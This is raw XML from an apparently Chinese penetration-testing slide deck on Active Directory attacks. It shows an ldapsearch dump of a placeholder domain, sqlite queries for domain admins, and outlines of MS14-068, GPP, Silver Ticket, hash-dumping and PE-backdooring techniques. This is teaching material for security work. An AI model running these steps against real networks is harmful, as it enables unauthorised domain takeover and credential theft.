            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>或者用Cobalt Strike的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>beacon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>你</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>为什么不直接用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>reGeorg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>因为当时提示trimDirectiveWhitespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>错误！！</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>域内信息收集</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="781051"/>
            <a:ext cx="10515600" cy="5100143"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>下很多工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>域信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dsquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>AdFind</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ldifde ，Sysinternals' AD Explorer </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>下呢</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>我用ldapsearch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>adoffline.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>root@Gamer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>:~/#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>ldapsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> -h AD1.corp.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>.net -x -D "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mickey</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>@corp.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>.net" -b "dc=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>corp,dc</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>,dc</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>=net" -E </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>pr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>=1000/</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>noprompt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>ldif</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>-wrap=no -w '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>password!@#</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>' &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>clint.ldif</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN"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77140" y="3489435"/>
            <a:ext cx="7156982" cy="29875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域内信息收集</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="75000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  ldapsearch + adoffline.py </a:t>
            </a:r>
            <a:r>
              <a:t>组合哪里好？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:t>离线的！！ 可搜索的！！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>查看description, comment, title or info域有内容的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sqlite&gt; select cn,description,title,comment,info from view_users where (description IS NOT NULL or title IS NOT NULL or comment IS NOT NULL or info IS NOT NULL);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>显示有计算机description的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sqlite&gt; select cn,description,info FROM view_computers WHERE (description IS NOT NULL or info IS NOT NULL);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>显示域内的winxp和2000主机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sqlite&gt; select dnsHostName,description,info,operatingSystem from view_computers where operatingSystem LIKE '%Windows%2000%' OR operatingSystem LIKE '%Windows%XP%';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>查看域管理员</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sqlite&gt; select member_cn from view_activegroupusers where group_cn = "Domain Admins";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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域内信息收集</a:t>
            </a:r>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446638" y="916905"/>
            <a:ext cx="6922857" cy="2413120"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3" descr="C:\Users\yubo\Desktop\飞信截图20160527193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847" y="3498463"/>
            <a:ext cx="7643813" cy="2881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3200" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>快速获取域权限的方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Low </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Hanging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Fruit   [</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>找软柿子捏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>       神器</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>kekeo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ms14068,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>比PyKEK方便</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 	GPP [KB2962486]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>十分钟爱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL SERVER </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>弱口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和潜在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Silver Ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[SPN]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>帐户通杀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Incognito </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>	DomainCache</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>的破解</a:t>
            </a:r>
            <a:endParaRPr dirty="0" err="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>管理员配置错误</a:t>
            </a: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十分钟爱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL SERVER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>弱口令和潜在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Silver Ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[SPN]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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230284" y="1214752"/>
            <a:ext cx="7963591" cy="3718883"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/tags/tag1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="MH" val="20151014142043"/>
  <p:tag name="MH_LIBRARY" val="CONTENTS"/>
  <p:tag name="MH_TYPE" val="TITLE"/>
  <p:tag name="ID" val="553524"/>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1*b*1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="b"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="58"/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_LEN" val="10"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_TEMPLATE_THUMBS_INDEX" val="1、6、7、10、11、13、15、17、20、26、28"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160062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236"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="MH" val="20151014142043"/>
  <p:tag name="MH_LIBRARY" val="CONTENTS"/>
  <p:tag name="MH_TYPE" val="OTHERS"/>
  <p:tag name="ID" val="553524"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="MH" val="20151014144733"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Oval 2"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="MH" val="20151014144733"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Straight Connector 31"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="MH" val="20151014144733"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Shape"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="i"/>
  <p:tag name="KSO_WM_UNIT_ID" val="279*i*1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160136"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="MH" val="20151014144733"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Shape"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="i"/>
  <p:tag name="KSO_WM_UNIT_ID" val="279*i*2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160136"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="MH" val="20151014144733"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Shape"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="i"/>
  <p:tag name="KSO_WM_UNIT_ID" val="279*i*3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160136"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="MH" val="20151014144733"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="Shape"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="i"/>
  <p:tag name="KSO_WM_UNIT_ID" val="279*i*4"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160136"/>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1*a*1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="16"/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_INDEX" val="0"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_LEN" val="9"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="A000120140530A99PPBG">
  <a:themeElements>
    <a:clrScheme name="自定义 618">
      <a:dk1>
        <a:srgbClr val="FFFFFF"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="585A5C"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="FFFFFF"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="585A5C"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="BA836A"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="D9BFA7"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="9EAA62"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="B8639C"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="DAD378"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="E15A5A"/>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4056</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>196</Paragraphs>
  <Slides>21</Slides>
  <Notes>13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宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>A000120140530A99PPBG</vt:lpstr>
      <vt:lpstr>渗透测试中的技巧</vt:lpstr>
      <vt:lpstr>议题的内容：</vt:lpstr>
      <vt:lpstr>目前已经掌握的情况</vt:lpstr>
      <vt:lpstr>准备工作：</vt:lpstr>
      <vt:lpstr>域内信息收集</vt:lpstr>
      <vt:lpstr>域内信息收集</vt:lpstr>
      <vt:lpstr>域内信息收集</vt:lpstr>
      <vt:lpstr>快速获取域权限的方法</vt:lpstr>
      <vt:lpstr>十分钟爱SQL SERVER 弱口令和潜在的Silver Ticket攻击 [SPN] </vt:lpstr>
      <vt:lpstr>明文密码抓取</vt:lpstr>
      <vt:lpstr>本地administrator帐户通杀 + Incognito </vt:lpstr>
      <vt:lpstr>DomainCache的破解</vt:lpstr>
      <vt:lpstr>管理员配置错误 </vt:lpstr>
      <vt:lpstr>维持域权限</vt:lpstr>
      <vt:lpstr>dump所有域HASH [gsecdump v2b5/ 卷影副本] </vt:lpstr>
      <vt:lpstr>文件服务器用BDF插PE</vt:lpstr>
      <vt:lpstr>evilpassfilter</vt:lpstr>
      <vt:lpstr>黑客工具使用的逆向思维</vt:lpstr>
      <vt:lpstr>黑客工具使用的逆向思维</vt:lpstr>
      <vt:lpstr>钓鱼站的access注入waf绕过</vt:lpstr>
      <vt:lpstr>钓鱼站的access注入waf绕过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渗透测试中的技巧</dc:title>
  <dc:creator/>
